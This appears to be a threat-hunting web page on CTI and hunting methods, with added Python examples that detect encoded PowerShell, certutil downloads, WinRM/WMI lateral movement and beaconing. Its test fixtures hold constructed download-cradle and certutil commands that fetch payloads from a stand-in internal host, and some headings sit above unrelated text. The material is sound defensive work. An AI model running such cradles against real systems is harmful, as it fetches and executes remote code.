Practical Threat Intelligence and Data-Driven Threat Hunting: PDF Free Download
Threat hunting is the active pursuit of threats within a network. Hunters form hypotheses about adversary behaviour and test them with analytics over large security datasets (sometimes aided by machine learning), surfacing anomalies or indicators of compromise (IoCs) that alert-driven tooling did not fire on.
Key Frameworks and Methodologies
The Pyramid of Pain ranks indicator types by how much it costs the adversary when defenders act on them; the higher you hunt, the harder it is for the attacker to adapt:

                     ▲
                    / \
                   /   \   TTPs (Tactics, Techniques & Procedures) - Toughest to change
                  /-----\
                 /       \  Tools - Challenging to replace
                /---------\
               /           \  Network/Host Artifacts - Annoying to fix
              /-------------\
             /               \  Domain Names - Simple to swap
            /-----------------\
           /                   \  IP Addresses - Easy to change
          /---------------------\
         /                       \  Hash Values - Trivial to modify
        └─────────────────────────┘
A hunt is only as good as the data supporting it. Hunters must know which logs contain the footprints of sophisticated adversaries.
Critical Data Sources
While the book by Valentina Costa-Gazcón that gives this page its title is a commercial Packt publication, you can legally read it for free through a 7-day free trial of Packt's subscription, or borrow it as an ebook via OverDrive if your local library carries it.
A hunter can search for incoming network logons (Security Event ID 4624, Logon Type 3) that are followed by a process spawned from the WinRM host process, wsmprovhost.exe. In KQL (Kusto Query Language) the hunt is a filter on those logon events joined to process-creation events with that parent, keyed on host and account.
To take your education further, download the PDF edition of this workbook, complete with code snippets, hunting playbooks, and configuration files for your home lab.
Good Hypothesis: "Adversaries are targeting our finance department using living-off-the-land binaries (LOLBins) such as certutil.exe to download remote payloads." It is good because it names a target group, a technique, and a specific binary, so it maps directly onto a query you can run and a result you can falsify.
Step 2: Gather, Clean, and Enrich Data
DNS logs: records of every domain resolution (UDP/TCP port 53). Attackers using domain generation algorithms (DGAs) or contacting malicious C2 domains leave footprints here.
Query Sysmon process-creation logs (Event ID 1) or Security Event 4688 for PowerShell command lines carrying flags such as -EncodedCommand (or its accepted prefixes -enc and -e), -w hidden, or -ExecutionPolicy Bypass. These flags are a deliberate effort to hide activity from the user and from basic logging. PowerShell script block logging (Event ID 4104) complements the command-line hunt by recording the decoded content of what an encoded command actually ran.
Use Case 2: Identifying Lateral Movement via WMI
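The command-line hunt described above, and the certutil hypothesis from the finance-department example, run over a handful of constructed Sysmon Event ID 1 records. This is an added example written in Python rather than KQL so it can be run offline; it is not code from the original page or from the book, and the host names, accounts and command lines are made up. It also shows the step the paragraph leaves implicit: -EncodedCommand is base64 of UTF-16LE, so the hunter can decode it in place instead of waiting for a 4104 event.

```python
"""Hunt constructed Sysmon Event ID 1 records for PowerShell obfuscation flags
and certutil-based LOLBin downloads. Added example; every host, user and
command line below is constructed, not real telemetry."""
import base64
import re

# PowerShell accepts any unambiguous prefix of a parameter name, so
# -e, -ec, -en, -enc and -EncodedCommand all mean the same thing.
ENCODED_CMD = re.compile(
    r"(?i)(?:^|\s)-e(?:c|n|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
HIDDEN_WINDOW = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden\b")
EXEC_BYPASS = re.compile(r"(?i)(?:^|\s)-e(?:p|xecutionpolicy)\s+bypass\b")
# certutil's URL cache switch doubles as a downloader; -decode rebuilds a
# binary from base64 text that was dropped on disk.
CERTUTIL_DL = re.compile(r"(?i)\bcertutil(?:\.exe)?\b.*\s-(?:urlcache|decode)\b")


def encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_ps(blob: str):
    """Reverse encode_ps(); return None if the blob is not a valid payload."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed download cradle used for the first record.
DOWNLOAD_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a')"

# Constructed Sysmon Event ID 1 (process creation) records.
SYSMON_EVENTS = [
    {"Computer": "FIN-WS01", "User": "CORP\\alice",
     "CommandLine": "powershell.exe -NoP -w hidden -enc " + encode_ps(DOWNLOAD_CRADLE)},
    {"Computer": "FIN-WS02", "User": "CORP\\bob",
     "CommandLine": r"certutil.exe -urlcache -split -f http://10.0.0.5/p.exe C:\Users\Public\p.exe"},
    {"Computer": "HR-WS07", "User": "CORP\\carol",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"Computer": "FIN-WS03", "User": "CORP\\dave",
     "CommandLine": "powershell.exe -Command Get-Process"},
    {"Computer": "FIN-WS01", "User": "CORP\\alice",
     "CommandLine": r"certutil.exe -hashfile C:\Temp\report.pdf SHA256"},
]


def hunt(events, target_prefix="FIN-"):
    """Return one finding per event that matches a hunted pattern.

    target_prefix marks hosts in the hypothesised target group (finance, a
    made-up naming convention). Out-of-scope hits are still returned but
    flagged: the hypothesis narrows attention, it does not discard evidence."""
    findings = []
    for ev in events:
        cl = ev["CommandLine"]
        reasons, decoded = [], None
        m = ENCODED_CMD.search(cl)
        if m:
            reasons.append("EncodedCommand")
            decoded = decode_ps(m.group(1))
        if HIDDEN_WINDOW.search(cl):
            reasons.append("hidden window")
        if EXEC_BYPASS.search(cl):
            reasons.append("ExecutionPolicy Bypass")
        if CERTUTIL_DL.search(cl):
            reasons.append("certutil download/decode (LOLBin)")
        if reasons:
            findings.append({
                "host": ev["Computer"], "user": ev["User"], "reasons": reasons,
                "decoded_command": decoded,
                "in_scope": ev["Computer"].startswith(target_prefix)})
    return findings


if __name__ == "__main__":
    for finding in hunt(SYSMON_EVENTS):
        print(finding)
```

The benign certutil -hashfile call and the plain -Command invocation fall through, the HR host is returned with in_scope set to False so the analyst can decide whether the hypothesis was too narrow, and the decoded cradle is attached to the finding rather than left as an opaque blob.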
During a hunt, analysts may discover a brand-new, undocumented technique used by an attacker. This finding is documented and fed back into the internal threat intelligence repository, enriching the organization's localized threat profile.
Essential Tooling Checklist
To make threat intelligence practical, it must be structured and actionable. The standard CTI lifecycle consists of six core phases: planning and direction, collection, processing, analysis and production, dissemination, and feedback.
Cyber threat intelligence is not just a collection of data feeds. It is refined, contextual knowledge about adversaries, their motivations, their intentions, and their technical methods.
Cyber threat intelligence (CTI) and data-driven threat hunting (TH) have become essential pillars of modern, proactive cybersecurity strategies. While traditional security reacts to alerts about known threats, these disciplines aim to uncover advanced adversaries who have already bypassed automated defenses or are planning to.
The Synergy Between Intelligence and Hunting
What specific SIEM (e.g., Splunk, Microsoft Sentinel, ELK) do you currently use?
Security Log: Successful Logon (Event ID 4624)
Sysmon Log: Process Creation (Event ID 1)
3. The Hunting Query (Splunk / KQL Syntax Example)
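The WinRM hunt described earlier and the WMI lateral-movement use case share one shape: a network logon followed, on the same host and for the same account, by a process whose parent is the remoting host (wsmprovhost.exe for WinRM, WmiPrvSE.exe for WMI). The block below is an added example in Python over constructed 4624 and Sysmon records, not a query from the original page or the book; the host names, accounts, IP addresses and the 60-second join window are assumptions. The join is the point: WmiPrvSE.exe also spawns processes for purely local WMI provider work, and Logon Type 3 also covers SMB file access, so neither signal alone is a hunt.

```python
"""Join network logons (Security Event ID 4624, Logon Type 3) to Sysmon
process creations (Event ID 1) whose parent is a remoting host process.
Added example over constructed records; hosts, users and IPs are made up."""
from datetime import datetime, timedelta
from ntpath import basename

# Parent processes that a remote caller's process lands under.
LATERAL_PARENTS = {
    "wsmprovhost.exe": "WinRM / PowerShell Remoting",
    "wmiprvse.exe": "WMI (e.g. wmic process call create)",
}

# Constructed Security log records (only the fields the hunt needs).
SECURITY_EVENTS = [
    {"Computer": "FIN-SRV01", "TimeCreated": "2024-03-04T09:00:00", "EventID": 4624,
     "LogonType": 2, "TargetUserName": "jsmith", "IpAddress": "-"},
    {"Computer": "FIN-SRV01", "TimeCreated": "2024-03-04T10:15:02", "EventID": 4624,
     "LogonType": 3, "TargetUserName": "svc_backup", "IpAddress": "10.20.30.40"},
    {"Computer": "FIN-SRV02", "TimeCreated": "2024-03-04T11:00:00", "EventID": 4624,
     "LogonType": 3, "TargetUserName": "fshare", "IpAddress": "10.20.30.41"},
    {"Computer": "FIN-SRV03", "TimeCreated": "2024-03-04T12:30:08", "EventID": 4624,
     "LogonType": 3, "TargetUserName": "svc_backup", "IpAddress": "10.20.30.40"},
]

# Constructed Sysmon Event ID 1 records.
SYSMON_EVENTS = [
    {"Computer": "FIN-SRV01", "TimeCreated": "2024-03-04T09:00:03", "EventID": 1,
     "User": "CORP\\jsmith", "ParentImage": r"C:\Windows\System32\userinit.exe",
     "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
    {"Computer": "FIN-SRV01", "TimeCreated": "2024-03-04T10:15:04", "EventID": 1,
     "User": "CORP\\svc_backup", "ParentImage": r"C:\Windows\System32\wsmprovhost.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
    {"Computer": "FIN-SRV03", "TimeCreated": "2024-03-04T12:30:10", "EventID": 1,
     "User": "CORP\\svc_backup", "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c whoami"},
    # Local WMI provider activity: no inbound logon, must not be flagged.
    {"Computer": "FIN-SRV04", "TimeCreated": "2024-03-04T13:00:00", "EventID": 1,
     "User": "NT AUTHORITY\\SYSTEM", "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Program Files\Vendor\agent.exe", "CommandLine": "agent.exe --inventory"},
]


def _ts(stamp):
    return datetime.fromisoformat(stamp)


def _account(user):
    """'CORP\\svc_backup' -> 'svc_backup' so it compares to TargetUserName."""
    return user.rsplit("\\", 1)[-1].lower()


def hunt_lateral_movement(security_events, sysmon_events, window=timedelta(seconds=60)):
    """Return remoting-spawned processes that follow a network logon for the
    same account on the same host within `window` (assumed 60 s)."""
    network_logons = [e for e in security_events
                      if e["EventID"] == 4624 and e["LogonType"] == 3]
    findings = []
    for proc in sysmon_events:
        if proc["EventID"] != 1:
            continue
        parent = basename(proc["ParentImage"]).lower()
        if parent not in LATERAL_PARENTS:
            continue
        started = _ts(proc["TimeCreated"])
        for logon in network_logons:
            if logon["Computer"] != proc["Computer"]:
                continue
            if logon["TargetUserName"].lower() != _account(proc["User"]):
                continue
            lag = started - _ts(logon["TimeCreated"])
            if timedelta(0) <= lag <= window:
                findings.append({
                    "host": proc["Computer"], "user": logon["TargetUserName"],
                    "source_ip": logon["IpAddress"], "technique": LATERAL_PARENTS[parent],
                    "child": basename(proc["Image"]), "command_line": proc["CommandLine"],
                    "seconds_after_logon": lag.total_seconds()})
                break
    return findings


def pivot_by_source(findings):
    """Group hits by remote IP: one source reaching many servers is the
    classic lateral-movement shape and the next thing to pivot on."""
    by_ip = {}
    for f in findings:
        by_ip.setdefault(f["source_ip"], set()).add(f["host"])
    return {ip: sorted(hosts) for ip, hosts in by_ip.items()}


if __name__ == "__main__":
    hits = hunt_lateral_movement(SECURITY_EVENTS, SYSMON_EVENTS)
    for hit in hits:
        print(hit)
    print(pivot_by_source(hits))
```

On the constructed data the two remoting hits share a source address, and that pivot (one workstation, two servers, one service account, two techniques) is what turns two events into a hunt lead. Keep the window tight: a logon hours before a WmiPrvSE.exe child is coincidence, not a session.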
Export NetFlow data or firewall logs into an analysis tool such as a Jupyter notebook. For each internal source and external destination, calculate the time delta between consecutive connections. A near-constant interval (for example roughly every 30 seconds, usually with a little jitter added by the implant) sustained for hours is an automated process checking in, not a person browsing. Benign agents beacon too, so treat a hit as a lead and pivot to the destination's reputation and the process that owns the connection.
Automation, Metrics, and Program Maturity
Leveraging Automation with SOAR
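The time-delta analysis described above, as an added Python example that is not from the original page or the book: the flow records are synthetic (a jittered beacon, a person browsing in bursts, and a too-short run to the same C2 address), the IP addresses are documentation ranges, and the thresholds (20 connections minimum, coefficient of variation at most 0.25) are assumptions to tune against your own baseline. It scores regularity with stdev/mean rather than testing for an exact period, which is what the jitter caveat requires.

```python
"""Beacon detection from inter-arrival times of outbound connections.
Added example over constructed flow records (documentation-range IPs,
synthetic timing); runs in a notebook cell or as a script."""
import random
import statistics
from collections import defaultdict
from datetime import datetime, timedelta


def _make_flows():
    """Build a synthetic flow log: one jittered beacon, one human, one short run."""
    rng = random.Random(7)  # fixed seed so the results are reproducible
    t0 = datetime(2024, 3, 4, 8, 0, 0)
    flows = []
    # Implant: ~30 s period with +/-3 s jitter, 200 check-ins (about 100 minutes).
    t = t0
    for _ in range(200):
        flows.append({"src": "10.0.5.23", "dst": "203.0.113.7", "ts": t})
        t += timedelta(seconds=30 + rng.uniform(-3, 3))
    # Person browsing: bursts of requests separated by minutes of nothing.
    t = t0
    for _ in range(10):
        t += timedelta(seconds=rng.randint(120, 900))
        for _ in range(6):
            t += timedelta(seconds=rng.uniform(0.5, 5))
            flows.append({"src": "10.0.5.24", "dst": "198.51.100.10", "ts": t})
    # Same C2 address, but only five connections: too few to judge regularity.
    t = t0
    for _ in range(5):
        flows.append({"src": "10.0.5.25", "dst": "203.0.113.7", "ts": t})
        t += timedelta(seconds=30)
    rng.shuffle(flows)  # real exports are not sorted per pair
    return flows


FLOWS = _make_flows()


def inter_arrival_deltas(flows):
    """Seconds between consecutive connections, per (src, dst) pair."""
    by_pair = defaultdict(list)
    for f in flows:
        by_pair[(f["src"], f["dst"])].append(f["ts"])
    deltas = {}
    for pair, stamps in by_pair.items():
        stamps.sort()
        deltas[pair] = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
    return deltas


def find_beacons(flows, min_connections=20, max_cv=0.25):
    """Flag pairs whose interval is nearly constant. The coefficient of
    variation (stdev / mean) tolerates the jitter real implants add, which
    a test for an exact period would miss. Thresholds are assumed values."""
    findings = []
    for (src, dst), deltas in inter_arrival_deltas(flows).items():
        if len(deltas) + 1 < min_connections:
            continue
        mean = statistics.fmean(deltas)
        cv = statistics.pstdev(deltas) / mean if mean > 0 else float("inf")
        if cv <= max_cv:
            findings.append({"src": src, "dst": dst, "connections": len(deltas) + 1,
                             "period_s": round(mean, 1), "cv": round(cv, 3)})
    return findings


if __name__ == "__main__":
    for beacon in find_beacons(FLOWS):
        print(beacon)
```

The bursty human traffic scores a coefficient of variation well above 1 because its deltas mix sub-second gaps with multi-minute silences, while the jittered implant scores under 0.1. Lowering min_connections to 5 also surfaces the short run to 203.0.113.7, which is the trade-off to make deliberately: a short window catches implants early but pulls in every update checker on the network.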